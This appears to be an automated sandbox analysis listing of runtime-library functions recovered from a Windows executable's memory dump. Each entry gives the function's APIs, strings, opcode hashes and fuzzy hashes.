                                                                                                                                                                      Function 00007FF68606A254, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                      • Opcode ID: 17aa42be1855e8293f7d7b9052321d776abf8ab5934ab8638aae0abb00b52cbe
                                                                                                                                                                      • Instruction ID: ffbc06f864d3c20d048a68deb15cb0539d80aca42c9d9ee4a6816d0079acac14
                                                                                                                                                                      • Opcode Fuzzy Hash: 17aa42be1855e8293f7d7b9052321d776abf8ab5934ab8638aae0abb00b52cbe
                                                                                                                                                                      • Instruction Fuzzy Hash: 68115121618B81C6F7509B56ED4432966A0FF89BE4F144238EA5EC77A4DF3EDC84C748
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68604A6EC, Relevance: 9.2, APIs: 6, Instructions: 203COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiStringWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2829165498-0
                                                                                                                                                                      • Opcode ID: 966fd0f9edcf20bee512165f8027fd806704971acc4bd8b33a73d99cb10a7464
                                                                                                                                                                      • Instruction ID: e4e970074fd711171cacd4e9bca0704d882321770a750fd25843d58ff56e8116
                                                                                                                                                                      • Opcode Fuzzy Hash: 966fd0f9edcf20bee512165f8027fd806704971acc4bd8b33a73d99cb10a7464
                                                                                                                                                                      • Instruction Fuzzy Hash: 97817F32A18781C6EB308F51954036A67A1FF54BA8F140239EA5D9BBC8DF7EDC41C708
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686046410, Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2081738530-0
                                                                                                                                                                      • Opcode ID: f03270646cd50eae441d6e570d09acc80cf4af85bf9899de021a018538877541
                                                                                                                                                                      • Instruction ID: 320c7ae5b82d0190d7dacce252b8164599d983bd9c18daceee1cb3856b202457
                                                                                                                                                                      • Opcode Fuzzy Hash: f03270646cd50eae441d6e570d09acc80cf4af85bf9899de021a018538877541
                                                                                                                                                                      • Instruction Fuzzy Hash: F8318521E18A41C1EA31DB11E6511796360FFA8BD8F080639EA4D877A9EF7DEC41C708
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686048700, Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2081738530-0
                                                                                                                                                                      • Opcode ID: e442c3c5f32b225f9bfd1fcd874e039e77c952d174d73c7182559b48d446be9e
                                                                                                                                                                      • Instruction ID: fadfd4e3597c77162fa8d9dd5f54aa41c4213917b792671e72bd5fffaf00ae85
                                                                                                                                                                      • Opcode Fuzzy Hash: e442c3c5f32b225f9bfd1fcd874e039e77c952d174d73c7182559b48d446be9e
                                                                                                                                                                      • Instruction Fuzzy Hash: 6F319221B1CA42C0EB35DB15DA500796360FF64B98F180539DB5D8B7A5DEBEEC45D308
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68604D584, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                      • API String ID: 3523768491-393685449
                                                                                                                                                                      • Opcode ID: 7dfd4bda0c3efe84babe414968b57461c88ce9cb546e615a3c9a8c7545501632
                                                                                                                                                                      • Instruction ID: 6d28275b61e6a6cdf9480c66e1916d786a84459bda049bcfaa768e0be1317450
                                                                                                                                                                      • Opcode Fuzzy Hash: 7dfd4bda0c3efe84babe414968b57461c88ce9cb546e615a3c9a8c7545501632
                                                                                                                                                                      • Instruction Fuzzy Hash: 1FE1BF72A08686CAE7309F29D5803AD37A0FF6578CF10413EDA8D97696DF79E885C704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686042A20, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      • API String ID: 2967684691-1405518554
                                                                                                                                                                      • Opcode ID: 95256f8fe462874dbe4cdf2cd0a493a7b907c7330454fc589dac2ad9775c121e
                                                                                                                                                                      • Instruction ID: e9f11987a45bf7444e36987dd45e6cada8c014d9f368340fb092b66c08467fe7
                                                                                                                                                                      • Opcode Fuzzy Hash: 95256f8fe462874dbe4cdf2cd0a493a7b907c7330454fc589dac2ad9775c121e
                                                                                                                                                                      • Instruction Fuzzy Hash: F4416822B0AB81C9FB20DFA0D5512BC23B4FF64748F044439DE4DA6A9ADE79D916D348
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6860520AC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                      • Opcode ID: 355763e493dad6538389df0793eed467e39f6892aaedefc02179b19105f30a0b
                                                                                                                                                                      • Instruction ID: cac365fbcdd49248d29c80f402640334ea5fa32e40ef4e60d65fe62418105b5a
                                                                                                                                                                      • Opcode Fuzzy Hash: 355763e493dad6538389df0793eed467e39f6892aaedefc02179b19105f30a0b
                                                                                                                                                                      • Instruction Fuzzy Hash: 2DF0DA61B19782C2EF548B50EA953756360BF84740F44243EEA0F86565DE2EECC8C709
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68604C98C, Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                                                      • Opcode ID: 718134ce9e332f23656d71c396ac408a803ba87032f76a2a13b0102232623a57
                                                                                                                                                                      • Instruction ID: 2759fce01a233a68da7ebecad8676746168bec083552e1fa4b6773f12650f28c
                                                                                                                                                                      • Opcode Fuzzy Hash: 718134ce9e332f23656d71c396ac408a803ba87032f76a2a13b0102232623a57
                                                                                                                                                                      • Instruction Fuzzy Hash: EAB1DE22A0A682C1EA75DB1596403386791FF64B8CF09843DDE4D87796DFBEEC41C34A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6860634B4, Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6860634F6
                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF686063473,?,?,FFFFFFFE,00007FF686063EB2), ref: 00007FF6860635B4
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF686063473,?,?,FFFFFFFE,00007FF686063EB2), ref: 00007FF68606363E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2210144848-0
                                                                                                                                                                      • Opcode ID: a98c3a2d31644f2f566c4bb38b19cf0d62c00298df2419fbc97fda4ba4da40a1
                                                                                                                                                                      • Instruction ID: 317d06f5ae302da0e48c065cb04c27b075ea6e08962387bf941d6a074bdf7608
                                                                                                                                                                      • Opcode Fuzzy Hash: a98c3a2d31644f2f566c4bb38b19cf0d62c00298df2419fbc97fda4ba4da40a1
                                                                                                                                                                      • Instruction Fuzzy Hash: 4981D062E18752C4FB249B258A406BC27A0FF44B94F446139DF0E93795DF3EAC81C358
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6860423B0, Relevance: 7.7, APIs: 5, Instructions: 187COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1087005451-0
                                                                                                                                                                      • Opcode ID: c9488d55b9731c411e05d05deab3263c259b16932df21f0be099f52025e84c70
                                                                                                                                                                      • Instruction ID: 6ec516fd045c8b392b3d2491c0716dbefa72b67b88e49aa344d241a48c0a691e
                                                                                                                                                                      • Opcode Fuzzy Hash: c9488d55b9731c411e05d05deab3263c259b16932df21f0be099f52025e84c70
                                                                                                                                                                      • Instruction Fuzzy Hash: F171BE22B14B81C5EB20CF65E2413AC2361FF64798F408239DE6C56BD6DFB9E985C344
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68605C48C, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                      • Opcode ID: 09467e227c6f763a2ca8e31c9d578d3e99d2a4337f8899ac365743204cab12c4
                                                                                                                                                                      • Instruction ID: 8d4f594145dab9a520c0c9cda770753f94a3d9dcbdc312dbba7bdc6a8f5751b9
                                                                                                                                                                      • Opcode Fuzzy Hash: 09467e227c6f763a2ca8e31c9d578d3e99d2a4337f8899ac365743204cab12c4
                                                                                                                                                                      • Instruction Fuzzy Hash: AB51E723D0CA46C5F6229B389A5477A6360BF44354F04823DE95EF65D4DF3EADC1C60A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686068F40, Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                      • Opcode ID: eaed8dfff0f68ad8df544ac5f149add81e04ab95f19dfb156c94115c05b10cc8
                                                                                                                                                                      • Instruction ID: 9ee381744f104b44b18f5c0586415cec5ea30196b59c49b9c9b3aece1a4f87cb
                                                                                                                                                                      • Opcode Fuzzy Hash: eaed8dfff0f68ad8df544ac5f149add81e04ab95f19dfb156c94115c05b10cc8
                                                                                                                                                                      • Instruction Fuzzy Hash: FD11B622E9CB07D1F6541228E64537500527F98375E04063CE76EDE2D6EE2E9DC0E12C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68604DC98, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                      • Opcode ID: eace6af2f1a7ebbb4b7aff053afb1977c84a43959c171a794db1e127813ce6e2
                                                                                                                                                                      • Instruction ID: fe4908e70b1053a90bc5b5b00609b3dae01b2e9ce3d270f824a58486afa4cc53
                                                                                                                                                                      • Opcode Fuzzy Hash: eace6af2f1a7ebbb4b7aff053afb1977c84a43959c171a794db1e127813ce6e2
                                                                                                                                                                      • Instruction Fuzzy Hash: 9791DE73A08785CAE730DB65E9802AC7BA0FB1478CF10413AEA4C97B95DF79D995CB04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68604DA80, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                      • Opcode ID: bee794e28527fa9dd78a6d9169989570187a9c92bc85060df153b9b73eff720a
                                                                                                                                                                      • Instruction ID: 66228132eeb79dc516bf39ea8789bd632d29b5d78dcaa01e51fb507e00bd65f7
                                                                                                                                                                      • Opcode Fuzzy Hash: bee794e28527fa9dd78a6d9169989570187a9c92bc85060df153b9b73eff720a
                                                                                                                                                                      • Instruction Fuzzy Hash: A5514932A08A8ACAE730CF65D1403AD77A0FB54B8CF04456AEE4D53B99CFB9E845C704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68604E20C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                      • Opcode ID: 6b6b60d445c1a2224ee2a98b02a42136a49554e3719dd5277a76b90849d165cc
                                                                                                                                                                      • Instruction ID: b054635a4548256fe23b8957886d66917f857a99fb598c41335cc569750bce14
                                                                                                                                                                      • Opcode Fuzzy Hash: 6b6b60d445c1a2224ee2a98b02a42136a49554e3719dd5277a76b90849d165cc
                                                                                                                                                                      • Instruction Fuzzy Hash: F5517132908282C6EB748B15A6443687790FFA4B89F144139DA9DC7BD5CFBDEC90CB09
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686046CB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      • API String ID: 2775327233-1405518554
                                                                                                                                                                      • Opcode ID: 43c1f62b3845369044430ec07d34fc0da13400005639c16f280d7bfbc3669d88
                                                                                                                                                                      • Instruction ID: 6d425f40763d51f8043cbea3ded7774234cad7d380f3236e56378535ad1b7ca3
                                                                                                                                                                      • Opcode Fuzzy Hash: 43c1f62b3845369044430ec07d34fc0da13400005639c16f280d7bfbc3669d88
                                                                                                                                                                      • Instruction Fuzzy Hash: E7414922F1AA41C9EB64DF60D5906FC23A4FF54748F084438DA4DA7A55EE7AD922D308
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68604E444, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __except_validate_context_record
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 1467352782-3733052814
                                                                                                                                                                      • Opcode ID: 06ea674547fc63216b6d7ac8eb26704d84d03f3b606f441fc8f5971c62b80142
                                                                                                                                                                      • Instruction ID: 199b29d37cbba208d161a5a33327df54941b36013996fc28ea21253a50d8584d
                                                                                                                                                                      • Opcode Fuzzy Hash: 06ea674547fc63216b6d7ac8eb26704d84d03f3b606f441fc8f5971c62b80142
                                                                                                                                                                      • Instruction Fuzzy Hash: 7171A132A08691CADB708F25A6507797BA0FF54BCDF148139DB4C87B85CE6DE890C744
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686050C6C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-3916222277
                                                                                                                                                                      • Opcode ID: 3fb41e9282136a1e1aaa64fa86120ca5a0f36c0599b42a7a9d033910b2cc34f6
                                                                                                                                                                      • Instruction ID: 2b474ed54330cea7c8d109f9ec5894f0570f1b52238739f36189c28f7093e6ba
                                                                                                                                                                      • Opcode Fuzzy Hash: 3fb41e9282136a1e1aaa64fa86120ca5a0f36c0599b42a7a9d033910b2cc34f6
                                                                                                                                                                      • Instruction Fuzzy Hash: DE61A372919656CAE7688F28825D17C3BA5FF05B48F34113DCA0FA2294DF3AEC91C758
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%
